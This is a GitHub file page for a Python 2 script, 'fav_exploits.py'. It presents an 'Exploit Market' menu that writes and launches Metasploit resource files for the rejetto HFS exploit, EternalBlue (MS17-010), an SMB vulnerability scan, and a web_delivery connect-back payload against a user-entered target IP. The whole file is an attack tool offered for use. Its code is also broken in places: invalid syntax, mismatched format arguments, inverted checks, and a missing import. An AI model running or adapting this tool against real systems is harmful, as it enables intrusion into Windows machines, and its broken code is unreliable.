-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathfav_exploits.py
More file actions
238 lines (175 loc) · 6.48 KB
/
fav_exploits.py
File metadata and controls
238 lines (175 loc) · 6.48 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
# bin/python27
# Author: Abdul Aziz
"""Requirement: Must have Metasploit Framework Version: 4.14.28-dev or above installed."""
def rhostInfo():
global targetPCusername
global targetPCpassword
global targetPCdomain
targetPCusername = raw_input("Please Enter Your Target PC's Username: ")
targetPCpassword = raw_input("Please Enter Your Target PC's Password: ")
targetPCdomain = raw_input("Please Enter The Target PC's Domain Name: ")
if custom_process_name, targetPCusername, targetPCpassword, targetPCdomain == 0:
print("It Seems That You Do not have sufficient Information to Run This Exploit.\n Please")
break
else:
return targetPCusername
return targetPCpassword
return targetPCdomain
def processName():
global custom_process_name
while True:
global custom_process_name
print("Please Note: Press Enter to Skip and Default 'spoolsv.exe' will be used! ")
custom_process_name = raw_input("Please Enter A Custom Process Name: ")
if len(custom_process_name) == 0:
custom_process_name = "spoolsv.exe"
if len(custom_process_name) < 4 or custom_process_name[-4:] == '.exe':
print("Invalid Service Name or File Extension: '.exe'")
return custom_process_name
def target_ip():
while True:
global target_ip_address
target_ip_address = raw_input(' Please Enter the Target Ip Address: ')
ip_dotCount = target_ip_address.count(".")
if len(target_ip_address) <= 9 or ip_dotCount < 2:
print("Alert: %s is not a valid ip address. Let's Try Again!" % (target_ip_address))
else:
return target_ip_address
def web_deliveryPreRequesties():
global localIPaddr
global localPort
global srvhost
global srvport
localIPaddr = raw_input('Please Enter the Your Ip Address: ')
print("Press Enter to Set (SRVPort: 80 & LPORT 4444) as Default.")
localPort = int(input("Enter Your Connect Back Port: "))
srvport = int(input("Please Enter Server Port: "))
ip_dotCount = localIPaddr.count(".")
if len(localIPaddr) <= 9 or ip_dotCount < 2:
print("Please Enter Correct IP Address!")
if localPort, srvport in range(0, 65535):
print("Worked -- Passing..")
if len(localPort) == 0 or len(srvport) == 0:
localIPaddr = srvhost
localPort = 4444
srvport = 80
return localIPaddr
return localPort
return srvhost
return srvport
else:
print("Port Number is Invalid!")
def rejetto():
file = open("tmp/rejetto.exploit", "w")
file.write("""\
use exploit/windows/http/rejetto_hfs_exec
set RHOST %s
exploit
""" % (target_ip_address))
def eternalBlue():
file = open("tmp/eternalBlue.exploit", "w")
file.write("""\
use exploit/windows/smb/ms17_010_eternalblue
set RHOST %s
set ProcessName %s
exploit
""" % (target_ip_address, custom_process_name))
def smb_scan():
file = open("tmp/smb_scan.exploit", "w")
file.write("""\
use auxiliary/scanner/smb/smb_ms17_010
set RHOST %s
set SMBUser %s
set SMBPass %s
exploit
""" % (target_ip_address))
def web_delivery():
file = open("tmp/web_delivery.exploit", "w")
file.write("""\
use exploit/multi/script/web_delivery
set SRVHOST %s
set SRVPORT %s
set LHOST %s
set LPORT %s
set target 2
exploit
""" % (localIPaddr, localPort, srvhost, srvport))
def clearScreen():
os.system('clear')
def welcomeBanner():
clearScreen()
print"""
#-----------------------------------#
WELCOME TO EXPLOIT MARKET!
By: Abdul Aziz
#-----------------------------------#
PRESS ENTER TO START
"""
def exploitDescription():
clearScreen()
print"""
#---------------------------#
# ABDUL's FAV EXPLOITS LIST #
####---------------------------####
# Github: abdu1aziz -- Abdul Aziz #
-----------------------------------------------------------------------------------------------
1. Type 'rejetto': hfs file server attack (2.3b and below are vulnrable).
-----------------------------------------------------------------------------------------------
2. Type 'eternalBlue': dll injection attack over smb server.
-----------------------------------------------------------------------------------------------
3. Type 'smb_scan': Scans target to view if vulnrable to Remote code Execution.
-----------------------------------------------------------------------------------------------
4. Type 'web_delivery': to generate a link to deliever payload wirelessly.(Memory Injection).
-----------------------------------------------------------------------------------------------
"""
while True:
choice = raw_input("Please Choose an Exploit By Name or Number: ")
if choice == 1 or choice.lower() == 'rejetto':
target_ip()
rejetto()
runHandler = raw_input("Would You like to run the Handler? Y/N").lower()
if runHandler == 'y':
clearScreen()
print("Please Wait While We Get Things Up and Running!")
os.system("sudo msfconsole -q -r tmp/rejetto.exploit")
else:
print("Your Handler 'rejetto.exploit' has been successfully created at: 'tmp/rejetto.exploit'")
#------------------------------------------------------------------------------------------------------
elif choice == 2 or choice.lower() == 'eternalBlue':
target_ip()
eternalBlue()
runHandler = raw_input("Would You like to run the Handler? Y/N").lower()
if runHandler == 'y':
clearScreen()
print("Please Wait While We Get Things Up and Running!")
os.system("sudo msfconsole -q -r tmp/eternalBlue.exploit")
else:
print("Your Handler 'rejetto.exploit' has been successfully created at: 'tmp/rejetto.exploit'")
#-------------------------------------------------------------------------------------------------------
elif choice == 3 or choice.lower() == 'smb_scan':
target_ip()
rhostInfo()
smb_scan()
runHandler = raw_input("Would You like to run the Handler? Y/N").lower()
if runHandler == 'y':
clearScreen()
print("Please Wait While We Get Things Up and Running!")
os.system("sudo msfconsole -q -r tmp/smb_scan.exploit")
else:
print("Your Handler 'rejetto.exploit' has been successfully created at: 'tmp/rejetto.exploit'")
elif choice == 4 or choice.lower() == 'web_delivery':
pass
''' ALL FUNCTIONS TO RUN!'''
runHandler = raw_input("Would You like to run the Handler? Y/N").lower()
if runHandler == 'y':
''' RUN HANDLER HERE'''
pass
else:
print("Your Handler 'rejetto.exploit' has been successfully created at: 'tmp/rejetto.exploit'")
def main():
enterToStart = raw_input("")
if len(enterToStart) == 0:
os.system('clear && sudo msfdb init && clear')
exploitDescription()
if __name__ == '__main__':
main()